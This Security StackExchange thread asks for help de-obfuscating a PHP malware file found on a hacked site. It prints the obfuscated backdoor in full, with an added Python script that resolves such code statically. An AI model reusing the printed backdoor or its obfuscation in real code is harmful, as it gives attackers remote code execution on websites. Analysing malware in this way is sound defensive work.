
I have a PHP 7 site that had some malware-type files uploaded to it. My hosting provider notified me of it and I have removed them, but I wanted help in understanding the attack (help de-obfuscating, and help understanding what it does). Here is the source: DON'T RUN IT, as I don't know what it does.

<?php

$guillotine ='veLaT:(at'; $crust = 'cCrx9)'; $denials = 's';

$cockle='s';$cobby= 'e';

$cretinous ='uT,6)'; $antagonist = '[';$fortnightly ='iHr'; $formalism = 'i';$cowboy = 'a';$installed='i'; $lake =';R=^t';$dairymen='_';
$crept='$$i(f1a'; $bitterroot = 'v'; $arccos ='2?AEE_i_'; $lamb='a';$eradicated = 'tC';
$kimbell='sTiY';
$asymptotic= '"S';
$clarify = ')_,'; $firework='D/esH4+U';$clasping='b'; $divisor ='*rTts(';
$cautious ='EW-'; $embassy=')'; $chaperon ='t';$evinced ='s'; $ibid = 'P[P '; $alyson = 'KnTBe';

$buzzard= 'Sa_S);('; $laurent= ')Rk';
$enumerating= '>=Ueaa';$highly = '`7';$anonym= '0f_$R';$dam='r'; $gypsies ='rM?';$jaye= 't';$as= 'If';$flagrant = '8hHS$I)X';

$arcade = 'KT"'; $foolproof = 'r'; $bowmen ='F'; $incompatibly ='y'; $delegable='a';$heavy ='n$@Qsct';$diatribe= '4'; $campfire= 'o';
$hayyim= 'C;r__e'; $goober= 'e';$dejected= 'e';$bedazzle='$'; $incompletion = 'c'; $hypothetical= 'o'; $diploma= 'Ktusdd.J'; $irremediable='n';$epic ='eEt,S_a'; $faina = 'l(F'; $internet = 'T';

$ephemeris='('; $incorrect ='XfVg'; $binder='r'; $barnard = ')'; $libra= '"';$applied= 'O'; $christian = '_c';$bhoy = 'e';$grieving=']gspHH';$gained ='v'; $fisticuff ='3e:F';

$harlie ='EP)]'; $ermine ='h';

$bond = 'om$<a'; $groundsel ='c]_'; $banning ='r';$innocence ='$';$hutchins ='"'; $amoebae = 't';
$doggy ='y"'; $erminie='Z'; $finesse= '(T"(Vt[lT';

$differing= 'X($'; $atrophic='"]N:)ie'; $forswear = ')]xGK';$buddies = 'RE';
$cynthie = 'O[Tg6sce'; $lane ='(';
$encourage ='_';

$harassment='?p';$jobie ='i(';$camber ='['; $boiled = 'i$O';$bel = 'rQr(C);v';
$boating ='d';

$headwall = 'e';$exemplary = 'ek="5';$climate =';'; $comfortabilities =$cynthie['6'].$bel['2'] .$exemplary['0'].$bond['4'] . $finesse['5'].
$exemplary['0'] . $encourage .

$incorrect['1'] .$diploma['2']. $irremediable. $cynthie['6'].$finesse['5']. $boiled[0] .$bond['0']. $irremediable ;
$injunct =$ibid[3] ; $digestible=$comfortabilities($injunct,$exemplary['0'] .$bel['7'] . $bond['4'].$finesse['7']. $bel[3] . $bond['4']. $bel['2'] .$bel['2']. $bond['4'] .$doggy['0'].$encourage . $harassment['1'] .$bond['0']. $harassment['1'] .$bel[3].$incorrect['1'] .$diploma['2'].$irremediable. $cynthie['6'] .$encourage.$cynthie['3']. $exemplary['0'].$finesse['5'] .$encourage . $bond['4'].$bel['2'].
$cynthie['3'] . $cynthie[5]. $bel[3]. $bel[5] . $bel[5] .$bel[5] .$climate ); $digestible
($embarrassment['0'] , $fisticuff['3'], $arccos[2] , $cynthie[5],
$atrophic['2'], $divisor['0'],
$gypsies['1'],
$bond['3'] , $boiled['1'].$boiled[0]. $exemplary[2].$bond['4'] .$bel['2'].
$bel['2']. $bond['4'] .$doggy['0'] . $encourage .$bond['1'] .$exemplary['0'].$bel['2'] . $cynthie['3'].$exemplary['0'] .$bel[3].$boiled['1'] . $encourage.$buddies['0']. $buddies['1'].

$bel['1'].
$enumerating['2'].$buddies['1']. $epic[4].

$cynthie['2'].

$epic['3'].$boiled['1'] .$encourage. $bel['4'].$boiled['2']. $boiled['2'] .
$forswear['4'].$flagrant['5'] . $buddies['1'] . $epic['3'].$boiled['1']. $encourage.
$epic[4] . $buddies['1'] . $buddies['0']. $finesse['4'] .$buddies['1'].$buddies['0'] . $bel[5] .$climate.$boiled['1']. $bond['4'] . $exemplary[2]. $boiled[0]. $cynthie[5].$cynthie[5] .$exemplary['0']. $finesse['5'] .$bel[3]. $boiled['1']. $boiled[0] . $camber .$exemplary['3'] .$ermine . $forswear['2'] . $exemplary['1'] .

$cynthie['6'] .

$finesse['5']. $finesse['5']. $cynthie[5].
$incorrect['1'] .$exemplary['3']. $forswear['1'] .$bel[5]. $harassment['0'] .$boiled['1'].$boiled[0]. $camber. $exemplary['3'].
$ermine.$forswear['2']. $exemplary['1'] . $cynthie['6'].$finesse['5']. $finesse['5'] . $cynthie[5] .
$incorrect['1'] .$exemplary['3']. $forswear['1'].$atrophic['3'] . $bel[3].$boiled[0].$cynthie[5].$cynthie[5] . $exemplary['0'] .
$finesse['5'] .$bel[3]. $boiled['1'] .$boiled[0] .

$camber .$exemplary['3'] .$grieving['5']. $cynthie['2'] . $cynthie['2'].$harlie['1'] . $encourage .$grieving['5']. $differing['0'] .$forswear['4'].

$bel['4'] .$cynthie['2']. $cynthie['2'].$epic[4] . $fisticuff['3'] .$exemplary['3'] .
$forswear['1'].
$bel[5] .$harassment['0'] .

$boiled['1'].
$boiled[0] . $camber. $exemplary['3'] . $grieving['5'] .$cynthie['2'].$cynthie['2'] .$harlie['1'] . $encourage.$grieving['5'] .

$differing['0'] .$forswear['4']. $bel['4']. $cynthie['2'] . $cynthie['2'] .
$epic[4] . $fisticuff['3'] . $exemplary['3'] . $forswear['1'] .
$atrophic['3']. $boating.

$boiled[0].$exemplary['0'].$bel[5] .$climate . $exemplary['0'] . $bel['7'] .$bond['4']. $finesse['7'] .$bel[3]. $cynthie[5] .$finesse['5'] .$bel['2'] . $bel['2']. $exemplary['0'].$bel['7'].
$bel[3].$clasping . $bond['4'] .$cynthie[5].$exemplary['0']. $cynthie['4'].$diatribe.
$encourage.$boating. $exemplary['0'].

$cynthie['6'] . $bond['0'] . $boating. $exemplary['0'] .

$bel[3]. $cynthie[5] .

$finesse['5'].
$bel['2'].

$bel['2'] .

$exemplary['0'].$bel['7'].$bel[3].$boiled['1'] .

$bond['4']. $bel[5] .

$bel[5].$bel[5].$bel[5].$climate  );
ÁEDÁN
  • Can anyone give me a tip on a better way to ask this or more appropriate place to do so? – ÁEDÁN Jul 24 '17 at 15:18
  • I would try creating a virtual machine with a linux distro, setting up a completely closed firewall from inbound and outbound traffic and then try printing it. – noone392 Jul 24 '17 at 15:28
  • More canonical duplicate: [I found unknown PHP code on my server. How do I de-obfuscate the code?](https://security.stackexchange.com/q/115461/32746) – WhiteWinterWolf Jul 25 '17 at 07:57
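Added example (not part of the question or of any answer on this page): the snippet above never does anything clever, it only defines throwaway single-quoted fragments and then glues identifiers together one character at a time with string offsets (`$var['6']`, `$var[3]`). That pattern can be resolved statically, without ever executing the PHP, which is the safe way to learn what such a file calls. The script below parses the literal assignments, replays the concatenation chains, and lists every `$var(` call site with the name the variable resolves to. The `SAMPLE` it runs on is a constructed snippet in the same style, not the poster's code; the regexes and the `DANGEROUS` watch list are my own assumptions about how this family of droppers is written.

```python
import re

# Constructed sample written in the same style as the snippet in the question;
# it is NOT the poster's code. Fragments are defined first, then identifiers are
# assembled one character at a time through string offsets.
SAMPLE = r"""<?php
$apple = 'cXre'; $berry= 'a_t6';$cedar ='fu1n';
$dill='o';$elm = 'i)'; $fig= 'b4sd'; $semi = ';';
$fn =$apple['0'].$apple[2] . $apple['3'].$berry[0].$berry['2'].$apple['3'].
$berry['1'] .$cedar[0]. $cedar['1'].$cedar[3].$apple[0].$berry['2'].$elm['0'].$dill.$cedar[3] ;
$dec = $fig[0].$berry['0'] . $fig[2].$apple[3].$berry[3].$fig['1'].$berry[1].
$fig[3] .$apple[3].$apple[0].$dill.$fig[3].$apple[3];
$fn($dec($blob));
"""

# $name = 'literal';   (PHP single-quoted strings only escape \\ and \')
STRING_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# One term of a concatenation: $var, $var[3] or $var['3']
TERM = r"\$\w+(?:\[\s*'?\d+'?\s*\])?"
# $name = <term> . <term> . ... ;   (the chain may span several lines)
CHAIN_ASSIGN = re.compile(r"\$(\w+)\s*=\s*(" + TERM + r"(?:\s*\.\s*" + TERM + r")*)\s*;")
TERM_RE = re.compile(r"\$(\w+)(?:\[\s*'?(\d+)'?\s*\])?")
# $var( ... ) is a call through a variable: the callee is whatever $var holds
CALL = re.compile(r"\$(\w+)\s*\(")

# Function names that commonly appear once this kind of script is resolved
# (assumed watch list, extend as needed).
DANGEROUS = {"eval", "assert", "create_function", "system", "exec", "shell_exec",
             "passthru", "base64_decode", "gzinflate", "str_rot13"}


def php_unescape(s: str) -> str:
    return s.replace("\\'", "'").replace("\\\\", "\\")


def collect_strings(src: str) -> dict:
    """Map every single-quoted string assignment to its literal value."""
    return {name: php_unescape(val) for name, val in STRING_ASSIGN.findall(src)}


def resolve_chain(expr: str, env: dict) -> str:
    """Evaluate a '.'-joined chain of $var / $var[i] terms without running PHP."""
    out = []
    for name, idx in TERM_RE.findall(expr):
        val = env.get(name)
        if val is None:
            out.append(f"<undefined ${name}>")          # never assigned: do not guess
        elif idx == "":
            out.append(val)                              # whole string
        elif int(idx) < len(val):
            out.append(val[int(idx)])                    # single character at offset
        else:
            out.append(f"<out-of-range ${name}[{idx}]>")
    return "".join(out)


def resolve_assignments(src: str):
    """Return (resolved chain assignments, full environment incl. literals)."""
    env = collect_strings(src)
    resolved = {}
    for name, expr in CHAIN_ASSIGN.findall(src):
        env[name] = resolve_chain(expr, env)             # later chains may reuse earlier ones
        resolved[name] = env[name]
    return resolved, env


def dynamic_calls(src: str, env: dict) -> list:
    """List (variable, resolved callee) for every $var( call site."""
    return [(name, env.get(name, "<unresolved>")) for name in CALL.findall(src)]


def report(src: str) -> list:
    resolved, env = resolve_assignments(src)
    lines = [f"${n} = {v!r}" + ("  <-- DANGEROUS" if v in DANGEROUS else "")
             for n, v in resolved.items()]
    lines += [f"call via ${n}: {v}(...)" for n, v in dynamic_calls(src, env)]
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE)))
```

Run against the script in the question, the same resolver turns `$comfortabilities` into `create_function` and marks `$embarrassment['0']` as undefined, because that variable is never assigned anywhere in the snippet. Argument chains inside the calls (the long `$bel[...] . $bond[...]` runs) are not assignments, so hand them to `resolve_chain()` directly with the `env` returned by `resolve_assignments()`. Unlike pasting the file into an online tool, nothing here is executed and nothing leaves your machine.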

1 Answer


Okay, for de-obfuscation you can use online tools such as https://www.unphp.net/ or run a local VM to test what the PHP script does.

Also a piece of advice: since you found this in your website, it definitely means your website was hacked. As an incident response process you need to find the weakness in your website to prevent further attacks, else you will keep getting these issues.

Rory Alsop
Adetutu
  • Welcome to Security.SE. *"you can contact me for a Vulnerability Assessment on your website."*: I'm not sure this website is the best place to sell your services. Moreover, the aspect of dealing with a compromised server is already covered in [another question](https://security.stackexchange.com/q/39231/32746). I don't want to be rude, but this website is a place to allow people to learn, not to sell them services. – WhiteWinterWolf Jul 25 '17 at 08:00